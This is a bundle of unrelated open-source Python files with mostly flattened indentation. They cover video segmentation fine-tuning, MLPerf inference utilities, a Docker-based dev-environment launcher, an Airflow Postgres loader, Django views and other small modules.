# === finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | MIT ===
"""
References: https://github.com/scaelles/OSVOS-TensorFlow
"""
from __future__ import print_function
import os
import random
import tensorflow as tf
import time
import numpy as np
from utils import models
from utils.load_data_finetune import Dataset
from utils.logger import create_logger
# seed
seed = random.randint(1, 100000)
# seed = 0
tf.random.set_seed(seed)
random.seed(seed)
np.random.seed(seed)
# User defined path parameters
# finetuning (one label) and testing dataset
sequence_images_path = './datasets/finetune_test_dataset/JPEGImages/480p'
sequence_names = os.listdir(sequence_images_path)
# Get the best frame selection from BubbleNet
bub_frame_path = './datasets/bubbleNet_data/rawData'
def create_non_exist_file(non_exist_file):
"""Create the file when it does not exist"""
if not os.path.exists(non_exist_file):
os.mkdir(non_exist_file)
def select_optimal_frame(seq_name):
"""Use the optimal frame from BubbleNet selection for fine-tuning"""
# # Select from BN0 or BNLF
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/all.txt')
# # Select from BN0
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BN0.txt')
# Select from BNLF
frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BNLF.txt')
frame_file = open(frame_txt, 'r')
frame_nums = frame_file.readlines()
# The following code is used to extract the name of frame selection
# refer to the txt file in './datasets/bubbleNet_data/rawData/frame_selection' for your information
if len(frame_nums) == 3:
frame_random_jpg = frame_nums[2][:9]
frame_random_png = frame_nums[2][:5] + '.png'
    # when the two BubbleNet models select different frames, the txt file will have 5 lines
elif len(frame_nums) == 5:
frame_suggestion1_jpg = frame_nums[2][:9]
frame_suggestion1_png = frame_nums[2][:5] + '.png'
frame_suggestion2_jpg = frame_nums[4][:9]
frame_suggestion2_png = frame_nums[4][:5] + '.png'
frame_random_lst = random.choice(
[[frame_suggestion1_jpg, frame_suggestion1_png], [frame_suggestion2_jpg, frame_suggestion2_png]])
frame_random_jpg = frame_random_lst[0][:9]
frame_random_png = frame_random_lst[1][:9]
else:
raise ValueError("frame file from BubbleNet is not correct")
return frame_random_jpg, frame_random_png
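# Illustrative note (assumed file layout): each relevant line in the BubbleNet
# selection txt files starts with a frame name such as "00042.jpg", so slicing
# [:9] keeps the jpg name and [:5] + '.png' derives the matching annotation
# name, e.g. "00042.jpg" -> ("00042.jpg", "00042.png").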
def train_test(video_path_names):
start_time = time.time()
for sequence_name in video_path_names:
seq_name = "{}".format(sequence_name)
gpu_id = 0
# Train and test parameters
# training and testing or testing only
train_model = True
objectness_steps = 45000
# The path to obtain weights from objectness training
objectness_path = os.path.join('weights', 'objectness_weights', 'objectness_weights.ckpt-{}'.format(objectness_steps))
# The path to save weights of fine tuning
logs_path_base = os.path.join('weights', 'fine_tune_weights')
create_non_exist_file(logs_path_base)
logs_path = os.path.join(logs_path_base, seq_name)
logger = create_logger(logs_path_base)
logger.info('The random seed is {}'.format(seed))
max_training_iters = 200
# use GFS
use_GFS = True
# test data augmentation
test_aug = True
# train data augmentation
data_aug = True
logger.info('Data augmentation is {}'.format(data_aug))
logger.info('Test augmentation is {}'.format(test_aug))
logger.info('Use GFS is {}'.format(use_GFS))
# Define Dataset
        # the video for testing
test_frames = sorted(
os.listdir(os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name)))
test_imgs = [os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name, frame) for frame
in test_frames]
# result paths
create_non_exist_file('results')
result_path_base = os.path.join('results', 'segmentation')
create_non_exist_file(result_path_base)
result_path = os.path.join(result_path_base, seq_name)
create_non_exist_file(result_path)
if train_model:
if use_GFS:
# BubbleNet selection: one optimal frame
frame_random_jpg, frame_random_png = select_optimal_frame(seq_name)
selected_image = os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name,
frame_random_jpg)
selected_mask = os.path.join('datasets', 'finetune_test_dataset', 'Annotations', '480p', seq_name,
frame_random_png)
train_imgs = [selected_image + ' ' + selected_mask]
logger.info('select frame {} in folder {}'.format(frame_random_jpg, seq_name))
else:
# Train on the first frame
logger.info('train on first frame')
train_imgs = [os.path.join('datasets', 'finetune_test_dataset',
'JPEGImages', '480p', seq_name, '00000.jpg') + ' ' + os.path.join('datasets', 'finetune_test_dataset',
'Annotations', '480p', seq_name, '00000.png')]
dataset = Dataset(train_imgs, test_imgs, './', data_aug=data_aug, test_aug=test_aug)
# testing only
else:
# test augmentation is on
dataset = Dataset(None, test_imgs, './', test_aug=test_aug)
# Train the network
if train_model:
# More training parameters
learning_rate = 1e-7
save_step = max_training_iters
# no side supervision
side_supervision = 3
logger.info('The supervision mode is {}'.format(side_supervision))
display_step = 10
with tf.Graph().as_default():
with tf.device('/gpu:' + str(gpu_id)):
# global_step is related to the name of cpkt file
global_step = tf.Variable(0, name='global_step', trainable=False)
models.train_finetune(dataset, objectness_path, side_supervision, learning_rate, logs_path,
max_training_iters, save_step, display_step, global_step, logger, finetune=2,
iter_mean_grad=1, ckpt_name=seq_name, dropout_rate=1.0)
# Test the network
with tf.Graph().as_default():
with tf.device('/gpu:' + str(gpu_id)):
                # Load the fine-tuned weights for this sequence
checkpoint_path = os.path.join('weights/fine_tune_weights/', seq_name,
seq_name + '.ckpt-' + str(max_training_iters))
# generate results images(binary) to the results path
models.test(dataset, checkpoint_path, result_path)
end_time = time.time()
running_time = round(end_time - start_time, 3)
    FPS = 493.0 / running_time  # frames per second over the 493 test frames (constant from the original code)
logger.info('The testing time is {}s'.format(running_time))
logger.info('The FPS is {}'.format(FPS))
if __name__ == '__main__':
train_test(sequence_names)

# === kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | MIT ===
from dataclasses import field, dataclass
from typing import List
from kinopoisk_unofficial.contract.response import Response
from kinopoisk_unofficial.model.season import Season
@dataclass(frozen=True)
class SeasonsResponse(Response):
total: int
items: List[Season] = field(default_factory=list)

# === codepod/impl.py | alexmorley/codepod | Apache-2.0 ===
import subprocess
import os
import shutil
import tempfile
import random
import string
import yaml
src_dir=os.path.dirname(os.path.realpath(__file__))
def codepod(*,repository='',image=None,volumes=[],mount_tmp=True,host_working_directory=None,docker_opts=None,git_smart=False,no_pull=False,command=False):
if not docker_opts:
docker_opts=''
if docker_opts.startswith('"'):
docker_opts=docker_opts[1:-1]
if host_working_directory is None:
if not repository:
raise Exception('You must either specify a repository or a host working directory.')
host_working_directory=_get_random_directory()
host_working_directory=os.path.abspath(host_working_directory)
if repository:
if os.path.exists(host_working_directory):
raise Exception('Host working directory already exists: '+host_working_directory)
_git_clone_into_directory(repository,host_working_directory)
config={}
if os.path.exists(host_working_directory+'/.codepod.yml'):
print(host_working_directory+'/.codepod.yml')
config=_parse_yaml(host_working_directory+'/.codepod.yml')
print(':::::::::::::::::::::::config:',config)
if image is None:
if 'image' in config:
image=config['image']
if image is None:
image='magland/codepod:latest'
print('Using image: '+image)
opts=[
'-it',
'--mount type=bind,source={src_dir}/codepod_init_in_container.py,destination=/codepod_init,readonly',
'--mount type=bind,source={host_working_directory},destination=/home/project',
'--network host',
'--privileged',
'-e DISPLAY=unix{}'.format(os.environ.get('DISPLAY','')),
'--mount type=bind,source=/tmp/.X11-unix,destination=/tmp/.X11-unix'
]
    if command:
        # '-it' only makes sense for interactive sessions, so drop it when a
        # one-off command is given; 'tasks' may be absent from the config
        del opts[0]
        config.setdefault('tasks', []).append({'command': command})
# git configuration
#if [ -f "$HOME/.gitconfig" ]; then
# OPTS="$OPTS -v $HOME/.gitconfig:/home/theiapod/.gitconfig"
#fi
#if [ -d "$HOME/.git-credential-cache" ]; then
# OPTS="$OPTS -v $HOME/.git-credential-cache:/home/theiapod/.git-credential-cache"
#fi
path0=os.environ.get('HOME','')+'/.gitconfig'
if os.path.exists(path0):
print('Mounting '+path0)
opts.append('--mount type=bind,source={},destination={}'.format(path0,'/home/user/.gitconfig'))
path0=os.environ.get('HOME','')+'/.git-credential-cache'
if os.path.exists(path0):
print('Mounting '+path0)
opts.append('--mount type=bind,source={},destination={}'.format(path0,'/home/user/.git-credential-cache'))
if mount_tmp:
opts.append('--mount type=bind,source=/tmp,destination=/tmp')
for vv in volumes:
if type(vv)==tuple:
opts.append('--mount type=bind,source={},destination={}'.format(os.path.abspath(vv[0]),os.path.abspath(vv[1])))
else:
raise Exception('volumes must be tuples.')
if no_pull:
print('Not pulling docker image because no_pull was specified')
else:
try:
_run_command_and_print_output('docker pull {image}'.format(image=image))
except:
print('WARNING: failed to pull docker image: {image}... proceeding without pulling...'.format(image=image))
cmd='docker run {opts} {docker_opts} {image} /home/project {user} {uid}'
#cmd='docker run {opts} {image}'
cmd=cmd.replace('{opts}',' '.join(opts))
cmd=cmd.replace('{docker_opts}',docker_opts)
cmd=cmd.replace('{src_dir}',src_dir)
cmd=cmd.replace('{image}',image)
# cmd=cmd.replace('{repository}',repository)
cmd=cmd.replace('{host_working_directory}',host_working_directory)
cmd=cmd.replace('{user}',os.environ['USER'])
cmd=cmd.replace('{uid}',str(os.getuid()))
print('RUNNING: '+cmd)
os.system(cmd)
#_run_command_and_print_output(cmd)
#def _write_text_file(fname,txt):
# with open(fname,'w') as f:
# f.write(txt)
def _parse_yaml(fname):
try:
with open(fname) as f:
            obj = yaml.safe_load(f)  # safe_load avoids executing arbitrary YAML tags
return obj
except:
return None
def _get_random_directory():
return tempfile.gettempdir()+'/codepod_workspace_'+_get_random_string(10)
def _get_random_string(N):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))
def _git_clone_into_directory(repo,path):
cmd='git clone {} {}'.format(repo,path)
_run_command_and_print_output(cmd)
def execute(cmd):
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)
for stdout_line in iter(popen.stdout.readline, ""):
#yield stdout_line
        print(stdout_line, end='')  # readline output already includes the trailing newline
popen.stdout.close()
return_code = popen.wait()
if return_code:
raise subprocess.CalledProcessError(return_code, cmd)
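# Example (illustrative): stream the output of a long-running command and
# raise on a non-zero exit code.
# execute(['git', 'clone', 'https://github.com/user/repo', '/tmp/repo'])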
def _run_command_and_print_output(cmd):
print('RUNNING: '+cmd);
execute(cmd.split())

# === closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | Apache-2.0 ===
#! /usr/bin/env python3
# coding=utf-8
# Copyright (c) 2021 NVIDIA CORPORATION. All rights reserved.
# Copyright 2021 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import time
from scipy import signal
from global_vars import *
__doc__ = """
Collection of utilities 3D UNet MLPerf-Inference reference model uses.
gaussian_kernel(n, std):
returns gaussian kernel; std is standard deviation and n is number of points
apply_norm_map(image, norm_map):
applies normal map norm_map to image and return the outcome
apply_argmax(image):
returns indices of the maximum values along the channel axis
finalize(image, norm_map):
finalizes results obtained from sliding window inference
prepare_arrays(image, roi_shape):
returns empty arrays required for sliding window inference upon roi_shape
get_slice_for_sliding_window(image, roi_shape, overlap):
returns indices for image stride, to fulfill sliding window inference
runtime_measure(function):
custom-tailored decorator for runtime measurement of each inference
"""
def gaussian_kernel(n, std):
"""
Returns gaussian kernel; std is standard deviation and n is number of points
"""
gaussian1D = signal.gaussian(n, std)
gaussian2D = np.outer(gaussian1D, gaussian1D)
gaussian3D = np.outer(gaussian2D, gaussian1D)
gaussian3D = gaussian3D.reshape(n, n, n)
gaussian3D = np.cbrt(gaussian3D)
gaussian3D /= gaussian3D.max()
return gaussian3D
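# Illustrative property check (not part of the benchmark code): the kernel
# peaks at 1.0 in the centre voxel and decays symmetrically, so overlapping
# sub-volume predictions are blended smoothly when accumulated.
# >>> k = gaussian_kernel(5, 0.125 * 5)
# >>> k.shape, float(k[2, 2, 2])
# ((5, 5, 5), 1.0)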
def apply_norm_map(image, norm_map):
"""
Applies normal map norm_map to image and return the outcome
"""
image /= norm_map
return image
def apply_argmax(image):
"""
Returns indices of the maximum values along the channel axis
Input shape is (bs=1, channel=3, (ROI_SHAPE)), float -- sub-volume inference result
Output shape is (bs=1, channel=1, (ROI_SHAPE)), integer -- segmentation result
"""
channel_axis = 1
image = np.argmax(image, axis=channel_axis).astype(np.uint8)
image = np.expand_dims(image, axis=0)
return image
def finalize(image, norm_map):
"""
Finalizes results obtained from sliding window inference
"""
# NOTE: layout is assumed to be linear (NCDHW) always
# apply norm_map
image = apply_norm_map(image, norm_map)
# argmax
image = apply_argmax(image)
return image
def prepare_arrays(image, roi_shape=ROI_SHAPE):
"""
Returns empty arrays required for sliding window inference such as:
- result array where sub-volume inference results are gathered
- norm_map where normal map is constructed upon
- norm_patch, a gaussian kernel that is applied to each sub-volume inference result
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
image_shape = list(image.shape[2:])
result = np.zeros(shape=(1, 3, *image_shape), dtype=image.dtype)
norm_map = np.zeros_like(result)
norm_patch = gaussian_kernel(
roi_shape[0], 0.125*roi_shape[0]).astype(norm_map.dtype)
return result, norm_map, norm_patch
def get_slice_for_sliding_window(image, roi_shape=ROI_SHAPE, overlap=SLIDE_OVERLAP_FACTOR):
"""
Returns indices for image stride, to fulfill sliding window inference
Stride is determined by roi_shape and overlap
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
assert isinstance(overlap, float) and overlap > 0 and overlap < 1,\
f"Need sliding window overlap factor in (0,1): {overlap}"
image_shape = list(image.shape[2:])
dim = len(image_shape)
strides = [int(roi_shape[i] * (1 - overlap)) for i in range(dim)]
size = [(image_shape[i] - roi_shape[i]) //
strides[i] + 1 for i in range(dim)]
for i in range(0, strides[0] * size[0], strides[0]):
for j in range(0, strides[1] * size[1], strides[1]):
for k in range(0, strides[2] * size[2], strides[2]):
yield i, j, k
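# A minimal sketch (not part of the reference benchmark) of how the helpers
# above compose into full sliding-window inference. ``predict_fn`` is an
# assumed callable mapping a (1, C, *roi_shape) sub-volume to per-class scores.
def sliding_window_inference_sketch(image, predict_fn,
                                    roi_shape=ROI_SHAPE, overlap=SLIDE_OVERLAP_FACTOR):
    """Accumulate gaussian-weighted sub-volume predictions, then finalize."""
    result, norm_map, norm_patch = prepare_arrays(image, roi_shape)
    for i, j, k in get_slice_for_sliding_window(image, roi_shape, overlap):
        roi = (..., slice(i, i + roi_shape[0]),
               slice(j, j + roi_shape[1]),
               slice(k, k + roi_shape[2]))
        # weight each sub-volume prediction by the gaussian patch before accumulating
        result[roi] += predict_fn(image[roi]) * norm_patch
        norm_map[roi] += norm_patch
    return finalize(result, norm_map)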
def runtime_measure(function):
"""
A decorator for runtime measurement
Custom-tailored for measuring inference latency
Also prints str: mystr that summarizes work in SUT
"""
def get_latency(*args, **kw):
ts = time.time()
result, mystr = function(*args, **kw)
te = time.time()
print('{:86} took {:>10.5f} sec'.format(mystr, te - ts))
return result, ""
return get_latency
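# Illustrative (assumed) usage: the wrapped callable must return a
# ``(result, message)`` pair; the message is printed alongside the elapsed time.
#
# @runtime_measure
# def infer(sample):
#     return model(sample), "inference on one sample"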

# === fdtool/modules/GetFDs.py | dancps/FDTool | CC0-1.0 ===
import binaryRepr
# Create decorator function to see how many times functions are called
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs);
helper.calls = 0
helper.__name__= func.__name__
return helper;
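# The decorated function gains a ``.calls`` attribute, so e.g.
# ``CardOfPartition.calls`` (defined below) reports how many partition
# cardinalities have been computed so far.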
# Calculate Partition (C_k, r(U)) - the partitions
# of each candidate at level k are calculated
# Takes in data frame of relation and a candidate in C_km1
# Outputs partition of Candidate in C_km1 in relation to data frame
@call_counter
def CardOfPartition(Candidate, df):
# If length is one, find number of unique elements in column
if len(Candidate) == 1: return df[Candidate[0]].nunique()
# If length is +1, create groups over which to find number of unique elements
else: return df.drop_duplicates(Candidate).count()[0];
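# Worked toy example (assumed data): for a DataFrame with rows
# (A=1, B='x'), (A=1, B='y'), (A=2, B='x'):
# CardOfPartition(['A'], df) == 2 while CardOfPartition(['A', 'B'], df) == 3,
# so A -> B does not hold; equal cardinalities would imply the FD (Theorem 2).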
# Obtain FDs(C_km1) - checks the FDs of each
# candidate X in C_k
# - FDs of the form X -> v_i, where
# v_i *Exists* U - X^{+} are checked by
# comparing *Partition* X and *Partition* X v_i
#
# F = Null_Set
# for each candidate X in C_km1
# for each v_i *exists* U - X^{+} \\Pruning rule 3
# if (Cardinality(*Partition* X) == Cardinality(*Partition X v_i)) then
# {
# X* = X *Union* {v_i}
# F = F *Union* {X -> v_i} \\Theorem 2
# }
# return (F);
def f(C_km1, df, Closure, U, Cardinality):
# Set F to null list; Initialize U_c to remaining columns in data frame
F = []; U_c = list(df.head(0));
# Identify the subsets whose cardinality of partition should be tested
SubsetsToCheck = [list(Subset) for Subset in set([frozenset(Candidate + [v_i]) for Candidate in C_km1 for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)]))])];
# Add singleton set to SubsetsToCheck if on first k-level
if len(C_km1[0]) == 1: SubsetsToCheck += C_km1;
# Iterate through subsets mapped to the Cardinality of Partition function
for Cand, Card in zip(SubsetsToCheck, map(CardOfPartition, SubsetsToCheck, [df]*len(SubsetsToCheck))):
# Add Cardinality of Partition to dictionary
Cardinality[binaryRepr.toBin(Cand, U)] = Card;
# Iterate through candidates of C_km1
for Candidate in C_km1:
# Iterate though attribute subsets that are not in U - X{+}; difference b/t U and inclusive closure of candidate
for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)])):
# Check if the cardinality of the partition of {Candidate} is equal to that of {Candidate, v_i}
if Cardinality[binaryRepr.toBin(Candidate, U)] == Cardinality[binaryRepr.toBin(Candidate + [v_i], U)]:
# Add attribute v_i to closure
Closure[binaryRepr.toBin(Candidate, U)].add(v_i)
# Add list (Candidate, v_i) to F
F.append([tuple(Candidate), v_i]);
return Closure, F, Cardinality;

# === experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | MIT ===
import os
import numpy as np
import pandas as pd
import experiments.benchmarks.benchmark as benchmark
class ActivityBenchmark(benchmark.Benchmark):
def __init__(self):
super().__init__('activity',
(('--sequence_length', 64, int),
('--max_samples', 40_000, int),
('--sample_distance', 4, int),
('--loss_name', 'SparseCategoricalCrossentropy', str),
('--loss_config', {'from_logits': True}, dict),
('--metric_name', 'SparseCategoricalAccuracy', str)))
def get_data_and_output_size(self):
sequence_length = self.args.sequence_length
max_samples = self.args.max_samples
sample_distance = self.args.sample_distance
activity_table = pd.read_csv(os.path.join(self.supplementary_data_dir, 'activity.csv'), header=None)
sensor_inputs = []
time_inputs = []
activity_outputs = []
for activity_marker in activity_table[0].unique():
activity_series = activity_table[activity_table[0] == activity_marker].iloc[:, 1:]
for start_index in range(0, len(activity_series) - sequence_length + 1, sample_distance):
current_sequence = np.array(activity_series[start_index:start_index + sequence_length])
sensor_inputs.append(current_sequence[:, 1:8])
time_inputs.append(current_sequence[:, :1])
activity_outputs.append(current_sequence[-1, 8:])
return (np.stack(sensor_inputs)[:max_samples], np.stack(time_inputs)[:max_samples]), (np.stack(activity_outputs)[:max_samples],), 7
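    # Note: consecutive windows start ``sample_distance`` (default 4) rows apart,
    # so an activity series of length L yields about (L - sequence_length) / 4 + 1 samples.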
ActivityBenchmark()

# === apps/menuplans/views.py | jajadinimueter/recipe | MIT ===
import xml.etree.ElementTree as et
from dateutil import parser
from django.shortcuts import render
from django.shortcuts import redirect
from django.core.urlresolvers import reverse
import untangle
from .forms import MenuplanSearchForm
from .forms import MenuplanCreateForm
from .tables import MenuplanTable
from .dbaccess import add_menuplan
from .dbaccess import get_menuplans
from .dbaccess import create_menuplan
from .dbaccess import get_menuplan_display
def index(request):
search_query = None
if request.method == 'POST':
search_form = MenuplanSearchForm(request.POST)
else:
search_form = MenuplanSearchForm()
table_data = []
menuplans = get_menuplans(search_form.data.get('query'))
if menuplans:
document = untangle.parse(menuplans)
if int(document.menuplans['total']) > 0:
for menuplan in document.menuplans.get_elements():
name = menuplan.name.cdata
cd = parser.parse(menuplan.creationDate.cdata)
cd = cd.strftime('%d.%m.%Y %H:%M')
try:
nd = parser.parse(menuplan.name.cdata)
name = nd.strftime('%d.%m.%Y %H:%M')
except:
pass
table_data.append({
'name': name,
'creationDate': cd,
'people': menuplan.people.cdata,
'pk': menuplan.pk.cdata
})
return render(request, 'menuplans/index.html',
{'table': MenuplanTable(table_data),
'search_form': search_form})
def create(request):
if request.method == 'POST':
form = MenuplanCreateForm(request.POST)
if form.is_valid():
data = form.cleaned_data
pk, document = create_menuplan(data['people'], data['menus'])
add_menuplan(pk, et.tostring(document))
return redirect('menuplans.detail', pk=pk)
else:
form = MenuplanCreateForm()
return render(request, 'menuplans/create.html', {'form': form})
def join_non_empty(vals, sep=' '):
return sep.join([x for x in vals if x and x.strip()])
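# e.g. join_non_empty(['250', 'g', '', 'flour']) -> '250 g flour'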
def detail(request, pk):
if request.method == 'GET':
val = get_menuplan_display(pk)
print(val)
display = et.fromstring(val)
menuplan = []
shopping_list = []
recipes = []
for shopping_list_item in display.findall('.//shoppingListItem'):
unit = shopping_list_item.findtext('unit', '')
name = shopping_list_item.findtext('name')
amount = float(shopping_list_item.findtext('amount'))
if not amount:
amount = ''
alpha_values = shopping_list_item.findall('alphaAmounts/value')
if amount or not alpha_values:
shopping_list.append({
'name': name,
'amount': join_non_empty([str(amount), unit])
})
for alpha_value in alpha_values:
shopping_list.append({
'name': name,
'amount': join_non_empty([alpha_value.text, unit])
})
for e_plan in display.findall('days//day'):
menuplan.append({
'day': e_plan.findtext('number'),
'recipe': e_plan.findtext('recipe')
})
for e_recipe in display.findall('recipes//recipe'):
e_ings = e_recipe.findall('.//ingredient')
ingredients = []
for e_ing in e_ings:
ing_name = e_ing.findtext('name')
ing_unit = e_ing.findtext('.//unit', '')
ing_value = e_ing.findtext('.//value', '')
ing_comment = e_ing.findtext('.//comment', '')
ingredients.append(
join_non_empty([ing_value, ing_unit, ing_name, ing_comment]))
ingredients = join_non_empty(ingredients, ', ')
instructions = []
einstructions = e_recipe.findall('.//instruction/text')
for einst in einstructions:
instructions.append(einst.text)
recipes.append({
'name': e_recipe.findtext('name'),
'ingredients': ingredients,
'instructions': instructions
})
print(recipes)
return render(request,
'menuplans/detail.html',
{
'recipes': recipes,
'menuplan': menuplan,
'shopping_list': shopping_list,
})

# === data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | Apache-2.0 ===
from contextlib import closing
from io import StringIO
import numpy
import pandas
from airflow.providers.postgres.hooks.postgres import PostgresHook
from psycopg2.extensions import connection as psycopg2_connection
from data_detective_airflow.dag_generator.works import WorkType
from data_detective_airflow.operators.sinks.pg_loader import PgLoader, MAX_INSERT_ROWS_NUMBER
class PgSCD1DFUpdateInsert(PgLoader):
"""Update the target table by SCD 1 by diff_change_operation
:param source: Source
:param conn_id: Connection id
:param table_name: Table name for update
    :param key: The key by which to update. Avoid NULL values in the key.
:param diff_change_oper: Field with the flag of the operation to be applied to the record D,U,I
:param chunk_row_number: The number of rows in the chunk to load into the database and apply to the table
"""
ui_color = '#DDF4ED'
def __init__(
self,
source: list,
conn_id: str,
table_name: str,
key: list[str],
diff_change_oper: str,
chunk_row_number: int,
**kwargs
):
super().__init__(**kwargs)
self.conn_id = conn_id
self.table_name = table_name
self.key = key
self.diff_change_oper = diff_change_oper
self.chunk_row_number = chunk_row_number or MAX_INSERT_ROWS_NUMBER
self.source = source[0]
self.source_task = self.dag.task_dict[self.source]
self.source_task >> self # pylint: disable=pointless-statement
def execute(self, context):
hook = PostgresHook(postgres_conn_id=self.conn_id)
work = self.dag.get_work(work_type=WorkType.WORK_PG.value, work_conn_id=self.conn_id)
work.create(context)
source_df = self.source_task.result.read(context)
df_rows = len(source_df.index)
if not df_rows:
self.log.info('Source dataset is empty. Finishing task.')
return
if self.chunk_row_number and self.chunk_row_number < 1:
            raise RuntimeError('chunk_row_number must be a positive integer or None. '
                               f'Current value is "{self.chunk_row_number}".')
chunk_number = self._get_chunk_number(data_row_number=df_rows, chunk_row=self.chunk_row_number)
self.log.info(f'Will process {df_rows} rows in {chunk_number} chunks.')
source_split = numpy.array_split(source_df, chunk_number)
del source_df
source = f"{work.get_path(context)}.{self.table_name.split('.')[-1]}"
for it, chunk in enumerate(source_split):
self.log.info(f'Process chunk #{it + 1} of {chunk_number}.')
with closing(hook.get_conn()) as session:
self._unload_source_to_pg(tmp_table=source, conn=session, unload_df=chunk)
self._apply_diff_change_oper(source_table=source, conn=session)
session.commit()
def _unload_source_to_pg(self, tmp_table: str, conn: psycopg2_connection, unload_df: pandas.DataFrame):
"""Upload DataFrame to TEMPORARY TABLE in postgres
:param tmp_table: Name of the temporary table
:param conn: Connection to the database
:param unload_df: DataFrame to upload to the database
"""
create_query = """
DROP TABLE IF EXISTS {tmp_table} CASCADE;
CREATE TABLE {tmp_table} AS
SELECT {target_columns}, '' as {diff_change_oper}
FROM {target_table}
LIMIT 0
""".strip()
copy_query = """
COPY {tmp_table} ({source_columns})
FROM STDIN WITH (format csv, delimiter ';')
""".strip()
query_params = {
'tmp_table': tmp_table,
'target_columns': ','.join(
self.get_table_columns(table_name=self.table_name, conn=conn)),
'source_columns': ','.join(unload_df.columns),
'target_table': self.table_name,
'diff_change_oper': self.diff_change_oper
}
with closing(conn.cursor()) as cursor:
cursor.execute(create_query.format(**query_params))
s_buf = StringIO()
unload_df.to_csv(
path_or_buf=s_buf, index=False, header=False, sep=';')
s_buf.seek(0)
cursor.copy_expert(copy_query.format(**query_params), s_buf)
def _apply_diff_change_oper(self, source_table: str, conn: psycopg2_connection):
"""Apply diff_change_oper by key, ignores unmodified columns"""
query_params = self._get_query_params(source_table, conn)
delete_query = """
DELETE FROM {target_table} trg
USING {source_table} src
WHERE {key_eq_cond} AND src.{diff_change_oper} = 'D'
""".strip()
update_query = """
UPDATE {target_table} trg
SET {set_term}
FROM {source_table} src
WHERE {key_eq_cond} AND src.{diff_change_oper} = 'U'
""".strip()
insert_query = """
INSERT INTO {target_table}({target_columns})
SELECT {target_columns}
FROM {source_table} src
WHERE src.{diff_change_oper} = 'I'
""".strip()
with closing(conn.cursor()) as cursor:
cursor.execute(delete_query.format(**query_params))
cursor.execute(update_query.format(**query_params))
cursor.execute(insert_query.format(**query_params))
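    # Illustrative flow (assumed data): with key=['id'], a source row tagged 'U'
    # rewrites its matching target row (refreshing processed_dttm when present),
    # 'D' rows delete their match, and 'I' rows are appended to the target.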
def _get_query_params(self, source_table: str, conn: psycopg2_connection) -> dict[str, str]:
"""Creating parameters for queries"""
all_tgt_columns = self.get_table_columns(self.table_name, conn)
tgt_columns = [col for col in all_tgt_columns if col != 'processed_dttm']
key = self.key if isinstance(self.key, list) else [self.key]
key_eq_cond = ' and '.join(f"trg.{column}=src.{column}" for column in key)
changed_cond = [col for col in tgt_columns if col not in key]
set_term = ', '.join(f"{col} = src.{col}" for col in changed_cond)
if 'processed_dttm' in all_tgt_columns:
set_term = f'{set_term}, processed_dttm = now()'
target_columns = ','.join(tgt_columns)
return {
'target_table': self.table_name,
'source_table': source_table,
'key_eq_cond': key_eq_cond,
'target_columns': target_columns,
'set_term': set_term,
'diff_change_oper': self.diff_change_oper
}

# === django-server/fras/attendance/utils.py | ArleneAndrews/Facial-Recognition-Attendance-System | MIT ===
def convert_str_to_date(string):
from datetime import datetime
    return datetime.strptime(string, "%Y-%m-%d %H:%M:%S.%f")
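# e.g. convert_str_to_date("2021-04-16 06:11:41.000")
# -> datetime.datetime(2021, 4, 16, 6, 11, 41)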
def create_database():
from attendance.models.Student import Student
from attendance.models.WorkingDay import WorkingDay
from attendance.models.LectureAttendance import LectureAttendance
from datetime import date, timedelta
create_students = True
create_working_days = True
create_lecture_attendances = True
if create_students:
student = Student(id=1, full_name='Rohan Sawant', face_id='9ee44c8c-920d-41cd-a1e0-95e9c53e649e')
student.save()
student = Student(id=2, full_name='Tanmay Sawant', face_id='85e9211d-6e2a-4a0e-9dba-917311393e2e')
student.save()
student = Student(id=3, full_name='Anirudh Iyer', face_id='2274d070-127c-4472-bc48-9df549417c19')
student.save()
if create_working_days:
for i in range(30):
working_day = WorkingDay(date=date.today() + timedelta(i))
working_day.save()
working_day = WorkingDay(date=date.today())
working_day.save()
if create_lecture_attendances:
for working_day in WorkingDay.objects.all():
LectureAttendance(working_day=working_day, lecture_name="Physics").save()
LectureAttendance(working_day=working_day, lecture_name="English").save()
LectureAttendance(working_day=working_day, lecture_name="Geography").save()
LectureAttendance(working_day=working_day, lecture_name="Civics").save()
LectureAttendance(working_day=working_day, lecture_name="Recess").save()
LectureAttendance(working_day=working_day, lecture_name="Recess").save()
LectureAttendance(working_day=working_day, lecture_name="History").save()
LectureAttendance(working_day=working_day, lecture_name="Mathematics").save()
LectureAttendance(working_day=working_day, lecture_name="Biology").save()

# === plangym/core.py | FragileTech/plangym | MIT ===
"""Plangym API implementation."""
from abc import ABC
from typing import Any, Callable, Dict, Generator, Iterable, Optional, Tuple, Union
import gym
from gym.envs.registration import registry as gym_registry
from gym.spaces import Space
import numpy
import numpy as np
wrap_callable = Union[Callable[[], gym.Wrapper], Tuple[Callable[..., gym.Wrapper], Dict[str, Any]]]
class BaseEnvironment(ABC):
"""Inherit from this class to adapt environments to different problems."""
